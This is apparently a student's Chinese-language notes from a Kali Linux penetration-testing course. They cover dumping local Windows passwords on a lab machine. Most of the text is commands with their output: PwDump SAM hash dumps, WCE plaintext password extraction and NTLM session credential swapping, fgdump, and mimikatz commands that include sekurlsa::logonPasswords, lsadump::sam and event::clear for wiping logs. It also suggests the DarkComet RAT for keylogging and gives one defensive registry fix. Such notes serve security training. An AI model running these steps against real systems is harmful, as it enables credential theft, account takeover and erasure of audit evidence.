Kali Linux滲透測試 045 讀取windows本地密碼
本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程
1. 抓包嗅探
2. 鍵盤記錄本地密碼
3. 檢視本地快取密碼
4. WCE (WINDOWS CREDENTIAL EDITOR)
5. fgdump
6. mimikatz
1. 抓包嗅探
Windows
- Wireshark
- Omnipeek
- Commview
- Sniffpass:抓取密碼相關的資料包
Linux
- Tcpdump
- Wireshark
- Dsniff:抓取密碼相關的資料包
2. 鍵盤記錄本地密碼
可以使用木馬軟體 DarkCometRAT
在控制目標主機之後可以監控鍵盤記錄資訊
3. 檢視本地快取密碼
在瀏覽器檢視快取密碼
使用 Pwdump 檢視 windows 本地登入密碼
- windows 登入密碼儲存在 C:\Windows\System32\config\SAM 檔案中
- Pwdump 在 kali 系統中可以找到 /usr/share/windows-binaries/fgdump/
新增使用者
C:\Documents and Settings\kevin>net user user2 123456 /add C:\Documents and Settings\kevin>net user \\ICST-WINATT 的使用者帳戶 ------------------------------------------------------------- Administrator Guest HelpAssistant kevin SUPPORT_388945a0 test user1 user2 C:\Documents and Settings\kevin>cd \ C:\>PwDump.exe localhost Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73::: kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4::: SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07::: test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4::: user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4::: user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed. # 結果:前部分是 LMHASH ,後部分是 NTLMHASH
可以將結果儲存在檔案中,然後在 kali 中進行破解
4. WCE (WINDOWS CREDENTIAL EDITOR)
WINDOWS身份認證過程
WCE (WINDOWS CREDENTIAL EDITOR)
- windows 核心中儲存有密碼明文副本,安全機制較低
- 需要管理員許可權
- 工具保持在 kali 的 /usr/share/wce/wce-universal # 通用格式是自動識別32位和64位
多使用者登入目標主機
列舉登入賬號及會話
C:\>wce-universal.exe -lv 0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0 # 與 C:\>PwDump.exe localhost 結果相同
每隔5秒重新整理一次
C:>wce-universal.exe -r
刪除登入會話
C:\>wce-universal.exe -d 0020B19D C:\>wce-universal.exe -lv 001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
計算密碼對應的 HASH 值
C:\>wce-universal.exe -g passwd Password: passwd Hashes: 91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC
讀取核心中的明文密碼
C:\>wce-universal.exe -w user1\ICST-WINATT:123456 user2\ICST-WINATT:123456 test\ICST-WINATT:123456 kevin\ICST-WINATT:123456 NETWORK SERVICE\MSHOME: C:\>net user user1 111222 命令成功完成。 C:\>wce-universal.exe -w user1\ICST-WINATT:123456 user2\ICST-WINATT:123456 test\ICST-WINATT:123456 kevin\ICST-WINATT:123456 NETWORK SERVICE\MSHOME: # 當前核心中儲存的值會在下次登入被讀取出來
對 LUID 進行修改(將LUID改為匹配其他使用者的使用者名稱和密碼)
C:\>wce-universal.exe -lv 001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0 C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST- WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 Changing NTLM credentials of logon session 001E5D92h to: Username: kevin domain: ICST-WINATT LMHash: 44EFCE164AB921CAAAD3B435B51404EE NTHash: 32ED87BDB5FDC5E9CBA88547376818D4 NTLM credentials successfully changed! C:\>wce-universal.exe -lv 001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Win7 及 之前預設 都可遭受 WCE 攻擊
防範方法:修改登錄檔
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
刪除 wdigest 之後重啟計算機
5. fgdump
PwDump localhost
位置:Pwdump 在 kali 系統中可以找到 /usr/share/windows-binaries/fgdump/
fgdump
位置:Pwdump 在 kali 系統中可以找到 /usr/share/windows-binaries/fgdump/
放在 WinXP 中, 雙擊或在命令列執行 fgdump.exe 會自動生成三個檔案,檔案中儲存著密碼
6. mimikatz
在 kali 中的路徑 /usr/share/mimikatz,將 win32 複製到 windows 主機
C:\Win32>mimikatz.exe 檢視幫助是:: mimikatz # :: standard - Standard module [Basic commands (does not require module name)] crypto - Crypto Module sekurlsa - SekurLSA module [Some commands to enumerate credentials...] kerberos - Kerberos package module [] privilege - Privilege module process - Process module service - Service module lsadump - LsaDump module ts - Terminal Server module event - Event module misc - Miscellaneous module token - Token manipulation module vault - Windows Vault/Credential module minesweeper - MineSweeper module net - dpapi - DPAPI Module (by API or RAW access) [Data Protection application programming interface] busylight - BusyLight Module sysenv - System Environment Value module sid - Security Identifiers module iis - IIS XML Config module rpc - RPC control of mimikatz mimikatz # privilege:: Module : privilege Full name : Privilege module debug - Ask debug privilege * * driver - Ask load driver privilege security - Ask security privilege tcb - Ask tcb privilege backup - Ask backup privilege restore - Ask restore privilege sysenv - Ask system environment privilege id - Ask a privilege by its id name - Ask a privilege by its name mimikatz # privilege::debug mimikatz # sekurlsa:: mimikatz # sekurlsa::logonPasswords mimikatz # sekurlsa::wdigest mimikatz # process::list mimikatz # lsadump::sam mimikatz # lsadump::cache mimikatz # ts::multirdp mimikatz # event::clear mimikatz # event::drop mimikatz # misc::regedit mimikatz # token::whoami